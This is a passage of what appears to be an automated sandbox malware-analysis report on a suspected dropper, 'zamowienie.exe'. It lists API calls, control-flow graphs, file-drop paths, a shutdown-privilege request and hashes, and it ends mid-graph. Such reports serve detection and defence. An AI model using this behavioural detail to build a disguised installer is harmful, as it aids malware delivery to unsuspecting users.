                                                                                                                                              • GetFileAttributesA.KERNEL32(948,C:\Users\user\AppData\Local\Temp\,948,?,?), ref: 00403991
                                                                                                                                              • DeleteFileA.KERNEL32(948), ref: 0040399D
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,948,?,?), ref: 004039C9
                                                                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\zamowienie.exe,948,?), ref: 004039DF
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00426800,00426800,?,948,00000000), ref: 00403A32
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,0000000A,?), ref: 00403A4F
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A56
                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A6A
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A89
                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AAE
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403ACF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                                                                                                              • String ID: "$"C:\Users\user\Desktop\zamowienie.exe"$1033$948$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218$C:\Users\user\Desktop$C:\Users\user\Desktop\zamowienie.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$Noncomplacency$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                              • API String ID: 2956269667-3261695512
                                                                                                                                              • Opcode ID: b8906a635698c96d709144620d147003707e09af1145772372227047e552c961
                                                                                                                                              • Instruction ID: 37149e310ed48336178e261d9096f0fa44b5e9b365965d583ffb66409b90e883
                                                                                                                                              • Opcode Fuzzy Hash: b8906a635698c96d709144620d147003707e09af1145772372227047e552c961
                                                                                                                                              • Instruction Fuzzy Hash: 68F10870A00254AADB21AFA59D49BAF7FB8AF41306F0440BFF941B61D2D77C4645CB2E
                                                                                                                                              Function 00405B80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 594 405b80-405ba6 call 405e3e 597 405ba8-405bba DeleteFileA 594->597 598 405bbf-405bc6 594->598 599 405d49-405d4d 597->599 600 405bc8-405bca 598->600 601 405bd9-405be9 call 4063be 598->601 602 405bd0-405bd3 600->602 603 405cf7-405cfc 600->603 607 405bf8-405bf9 call 405d97 601->607 608 405beb-405bf6 lstrcatA 601->608 602->601 602->603 603->599 606 405cfe-405d01 603->606 609 405d03-405d09 606->609 610 405d0b-405d13 call 406751 606->610 612 405bfe-405c01 607->612 608->612 609->599 610->599 617 405d15-405d29 call 405d50 call 405b38 610->617 615 405c03-405c0a 612->615 616 405c0c-405c12 lstrcatA 612->616 615->616 618 405c17-405c35 lstrlenA FindFirstFileA 615->618 616->618 633 405d41-405d44 call 405502 617->633 634 405d2b-405d2e 617->634 620 405c3b-405c52 call 405d7b 618->620 621 405ced-405cf1 618->621 627 405c54-405c58 620->627 628 405c5d-405c60 620->628 621->603 623 405cf3 621->623 623->603 627->628 630 405c5a 627->630 631 405c62-405c67 628->631 632 405c73-405c81 call 4063be 628->632 630->628 635 405c69-405c6b 631->635 636 405ccc-405cde FindNextFileA 631->636 644 405c83-405c8b 632->644 645 405c98-405ca3 call 405b38 632->645 633->599 634->609 638 405d30-405d3f call 405502 call 406197 634->638 635->632 640 405c6d-405c71 635->640 636->620 642 405ce4-405ce7 FindClose 636->642 638->599 640->632 640->636 642->621 644->636 647 405c8d-405c96 call 405b80 644->647 653 405cc4-405cc7 call 405502 645->653 654 405ca5-405ca8 645->654 647->636 653->636 656 405caa-405cba call 405502 call 406197 654->656 657 405cbc-405cc2 654->657 656->636 657->636
                                                                                                                                              APIs
                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405BA9
                                                                                                                                              • lstrcatA.KERNEL32(00421958,\*.*,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405BF1
                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405C12
                                                                                                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405C18
                                                                                                                                              • FindFirstFileA.KERNELBASE(00421958,?,?,?,0040A014,?,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405C29
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405CD6
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405CE7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$\*.*
                                                                                                                                              • API String ID: 2035342205-1771764101
                                                                                                                                              • Opcode ID: 1c34df41f225ee6f3a1e1bb879dfece31770cb0a1fee5791fc0255ede9351830
                                                                                                                                              • Instruction ID: 36a6610349cd84d5fd36e12b5afcc6e5fbc36712f53838f94894807d8d85e247
                                                                                                                                              • Opcode Fuzzy Hash: 1c34df41f225ee6f3a1e1bb879dfece31770cb0a1fee5791fc0255ede9351830
                                                                                                                                              • Instruction Fuzzy Hash: 7F51C330804B4466EB216B65CC49BAF7A78DF42754F14817BF852751D2C73C8982DF5A
                                                                                                                                              Function 00402198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoCreateInstance.OLE32(00408410,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040221D
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 004022CF
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218, xrefs: 0040225D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218
                                                                                                                                              • API String ID: 123533781-1600892969
                                                                                                                                              • Opcode ID: 197a96f9d76337c7ea3fda3028378c64bae789d34cc9f02246278df0d2071d2a
                                                                                                                                              • Instruction ID: 009ee6b37e18c92ff8e208b0b517b51024f673be5c58238fecc1f6f88d24fa56
                                                                                                                                              • Opcode Fuzzy Hash: 197a96f9d76337c7ea3fda3028378c64bae789d34cc9f02246278df0d2071d2a
                                                                                                                                              • Instruction Fuzzy Hash: 17511B71A00218AFDF00DFA4C988A9D7BB5FF48314F2045BAF515FB2D1DA799981CB54
                                                                                                                                              Function 00406ADA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f773ac2e5aa11c7bf09cdfc96604597c9e88ef4b16e15b36fd805824a913d03c
                                                                                                                                              • Instruction ID: 1af9d468556d524f955ff30d05e21ad9cfee14d1e3ce6751349f8fa2a58e4811
                                                                                                                                              • Opcode Fuzzy Hash: f773ac2e5aa11c7bf09cdfc96604597c9e88ef4b16e15b36fd805824a913d03c
                                                                                                                                              • Instruction Fuzzy Hash: D4F19970D04229CBDF28CFA8C8946ADBBB1FF05305F14816ED856BB281C7386A86DF45
                                                                                                                                              Function 00401A43 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A56
                                                                                                                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A69
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1938659011-0
                                                                                                                                              • Opcode ID: e097cbf55bda460d24c5fab538e2d6bfabf44bcb5d93b52c9185126c412d543b
                                                                                                                                              • Instruction ID: 39fb2ba549112c13cfccdacc37b8b71097d554826537bdd4f7b55880e0a0b00b
                                                                                                                                              • Opcode Fuzzy Hash: e097cbf55bda460d24c5fab538e2d6bfabf44bcb5d93b52c9185126c412d543b
                                                                                                                                              • Instruction Fuzzy Hash: 6DF08C31B01201EBCB20CF669E48AAF7EA8EFA1355B10803BE145F61A0D6788643DF1C
                                                                                                                                              Function 00406751 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNELBASE(75923410,004221A0,00421D58,00405E81,00421D58,00421D58,00000000,00421D58,00421D58,75923410,?,75922EE0,00405BA0,?,75923410,75922EE0), ref: 0040675C
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406768
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: f2e23ad87d5570838264cbfd82f2bc45b63f49524226958c9645f8cb89411b00
                                                                                                                                              • Instruction ID: c8da4e672578e7cfa4b104c07fec31ec7e4793a54b14b92e18f5f0a10be287ac
                                                                                                                                              • Opcode Fuzzy Hash: f2e23ad87d5570838264cbfd82f2bc45b63f49524226958c9645f8cb89411b00
                                                                                                                                              • Instruction Fuzzy Hash: D2D012315050206BC2401738AE0CC5B7AA99F193357518B37F5B6F21F0C7748C32C69C
                                                                                                                                              Function 00404E63 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 152 404e63-404eb3 GetDlgItem * 2 153 4050e0-4050e7 152->153 154 404eb9-404f53 GlobalAlloc LoadImageA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 152->154 155 4050e9-4050f9 153->155 156 4050fb 153->156 157 404f61-404f6a DeleteObject 154->157 158 404f55-404f5f SendMessageA 154->158 159 4050fe-405107 155->159 156->159 160 404f6c-404f74 157->160 158->157 161 405112-405118 159->161 162 405109-40510c 159->162 163 404f76-404f79 160->163 164 404f9d-404fa1 160->164 167 405127-40512e 161->167 168 40511a-405121 161->168 162->161 166 4051f6-4051fd 162->166 169 404f7b 163->169 170 404f7e-404f9b call 406451 SendMessageA * 2 163->170 164->160 165 404fa3-404fd3 call 40445e * 2 164->165 208 4050a2-4050b5 GetWindowLongA SetWindowLongA 165->208 209 404fd9-404fdf 165->209 175 40526e-405276 166->175 176 4051ff-405205 166->176 171 405130-405133 167->171 172 4051a3-4051a6 167->172 168->166 168->167 169->170 170->164 180 405135-40513c 171->180 181 40513e-405153 call 404db1 171->181 172->166 177 4051a8-4051b2 172->177 178 405280-405287 175->178 179 405278-40527e SendMessageA 175->179 184 405461-405473 call 4044c5 176->184 185 40520b-405215 176->185 186 4051c2-4051cc 177->186 187 4051b4-4051c0 SendMessageA 177->187 189 405289-405290 178->189 190 4052bb-4052c2 178->190 179->178 180->172 180->181 181->172 207 405155-405166 181->207 185->184 193 40521b-40522a SendMessageA 185->193 186->166 194 4051ce-4051d8 186->194 187->186 196 405292-405293 ImageList_Destroy 189->196 197 405299-4052a0 189->197 200 405423-40542a 190->200 201 4052c8-4052d4 call 4011ef 190->201 193->184 202 405230-405241 SendMessageA 193->202 203 4051e9-4051f3 194->203 204 4051da-4051e7 194->204 196->197 205 4052a2-4052a3 GlobalFree 197->205 206 4052a9-4052b5 197->206 200->184 213 40542c-405433 200->213 226 4052e4-4052e7 201->226 227 4052d6-4052d9 201->227 211 405243-405249 202->211 212 40524b-40524d 202->212 203->166 204->166 205->206 206->190 207->172 216 405168-40516a 207->216 215 4050bb-4050be 208->215 217 404fe2-404fe7 209->217 211->212 219 40524e-405267 call 401299 SendMessageA 211->219 212->219 213->184 214 405435-40545f ShowWindow GetDlgItem ShowWindow 213->214 214->184 220 4050c0-4050d3 ShowWindow call 404493 215->220 221 4050d8-4050db call 404493 215->221 222 40516c-405173 216->222 223 40517d 216->223 224 405084-405097 217->224 225 404fed-405018 217->225 219->175 220->184 221->153 234 405175-405177 222->234 235 405179-40517b 222->235 236 405180-40519c call 40117d 223->236 224->217 229 40509d-4050a0 224->229 237 405054-405056 225->237 238 40501a-405052 SendMessageA 225->238 230 405328-40534c call 4011ef 226->230 231 4052e9-405302 call 4012e2 call 401299 226->231 239 4052db 227->239 240 4052dc-4052df call 404e31 227->240 229->208 229->215 253 405352 230->253 254 4053ee-4053f7 230->254 260 405312-405321 SendMessageA 231->260 261 405304-40530a 231->261 234->236 235->236 236->172 243 405058-40506a SendMessageA 237->243 244 40506c-405081 SendMessageA 237->244 238->224 239->240 240->226 243->224 244->224 258 405355-405360 253->258 256 405405-40540d 254->256 257 4053f9-4053ff InvalidateRect 254->257 256->200 259 40540f-40541e call 404d84 call 404d6c 256->259 257->256 262 405362-405371 258->262 263 4053d6-4053e8 258->263 259->200 260->230 266 40530c 261->266 267 40530d-405310 261->267 264 405373-405380 262->264 265 405384-405387 262->265 263->254 263->258 264->265 269 405389-40538c 265->269 270 40538e-405397 265->270 266->267 267->260 267->261 272 40539c-4053d4 SendMessageA * 2 269->272 270->272 273 405399 270->273 272->263 273->272
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404E7A
                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404E87
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404ED6
                                                                                                                                              • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404EED
                                                                                                                                              • SetWindowLongA.USER32(?,?,00405476), ref: 00404F07
                                                                                                                                              • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404F19
                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404F2D
                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404F43
                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404F4F
                                                                                                                                              • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404F5F
                                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404F64
                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404F8F
                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404F9B
                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405035
                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00405065
                                                                                                                                                • Part of subcall function 00404493: SendMessageA.USER32(?,?,?,004042C3), ref: 004044A1
                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405079
                                                                                                                                              • GetWindowLongA.USER32(?,?), ref: 004050A7
                                                                                                                                              • SetWindowLongA.USER32(?,?,00000000), ref: 004050B5
                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 004050C5
                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 004051C0
                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405225
                                                                                                                                              • SendMessageA.USER32(?,?,00000000,00000000), ref: 0040523A
                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,?), ref: 0040525E
                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040527E
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00405293
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004052A3
                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040531C
                                                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 004053C5
                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004053D4
                                                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 004053FF
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040544D
                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405458
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040545F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                              • String ID: $M$N
                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                              • Opcode ID: b84b5db26e268e8e4252558338ed57017ff44b35756f86841422fe8ceb23c02e
                                                                                                                                              • Instruction ID: 55de333454b24e32ae45244539792716bfd21411a43293e2b6f4d8f70d7fed6a
                                                                                                                                              • Opcode Fuzzy Hash: b84b5db26e268e8e4252558338ed57017ff44b35756f86841422fe8ceb23c02e
                                                                                                                                              • Instruction Fuzzy Hash: 24026EB0A00609AFDF20DF54DD45AAE7BB5FB44354F10813AEA14BA2E1C7798D82CF58
                                                                                                                                              Function 00403F64 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 275 403f64-403f76 276 403f7c-403f82 275->276 277 4040dd-4040ec 275->277 276->277 280 403f88-403f91 276->280 278 40413b-404150 277->278 279 4040ee-404136 GetDlgItem * 2 call 40445e SetClassLongA call 40140b 277->279 282 404190-404195 call 4044aa 278->282 283 404152-404155 278->283 279->278 284 403f93-403fa0 SetWindowPos 280->284 285 403fa6-403fad 280->285 299 40419a-4041b5 282->299 289 404157-404162 call 401389 283->289 290 404188-40418a 283->290 284->285 286 403ff1-403ff7 285->286 287 403faf-403fc9 ShowWindow 285->287 294 404010-404013 286->294 295 403ff9-40400b DestroyWindow 286->295 292 4040ca-4040d8 call 4044c5 287->292 293 403fcf-403fe2 GetWindowLongA 287->293 289->290 315 404164-404183 SendMessageA 289->315 290->282 298 40442b 290->298 305 40442d-404434 292->305 293->292 302 403fe8-403feb ShowWindow 293->302 306 404015-404021 SetWindowLongA 294->306 307 404026-40402c 294->307 303 404408-40440e 295->303 298->305 300 4041b7-4041b9 call 40140b 299->300 301 4041be-4041c4 299->301 300->301 312 4043e9-404402 DestroyWindow EndDialog 301->312 313 4041ca-4041d5 301->313 302->286 303->298 311 404410-404416 303->311 306->305 307->292 314 404032-404041 GetDlgItem 307->314 311->298 317 404418-404421 ShowWindow 311->317 312->303 313->312 318 4041db-404228 call 406451 call 40445e * 3 GetDlgItem 313->318 319 404060-404063 314->319 320 404043-40405a SendMessageA IsWindowEnabled 314->320 315->305 317->298 347 404232-40426e ShowWindow KiUserCallbackDispatcher call 404480 EnableWindow 318->347 348 40422a-40422f 318->348 322 404065-404066 319->322 323 404068-40406b 319->323 320->298 320->319 325 404096-40409b call 404437 322->325 326 404079-40407e 323->326 327 40406d-404073 323->327 325->292 328 404080-404086 326->328 329 4040b4-4040c4 SendMessageA 326->329 327->329 332 404075-404077 327->332 333 404088-40408e call 40140b 328->333 334 40409d-4040a6 call 40140b 328->334 329->292 332->325 343 404094 333->343 334->292 344 4040a8-4040b2 334->344 343->325 344->343 351 404270-404271 347->351 352 404273 347->352 348->347 353 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageA 351->353 352->353 354 4042a5-4042b6 SendMessageA 353->354 355 4042b8 353->355 356 4042be-4042f8 call 404493 call 403f45 call 4063be lstrlenA call 406451 SetWindowTextA call 401389 354->356 355->356 356->299 367 4042fe-404300 356->367 367->299 368 404306-40430a 367->368 369 404329-40433d DestroyWindow 368->369 370 40430c-404312 368->370 369->303 372 404343-404370 CreateDialogParamA 369->372 370->298 371 404318-40431e 370->371 371->299 373 404324 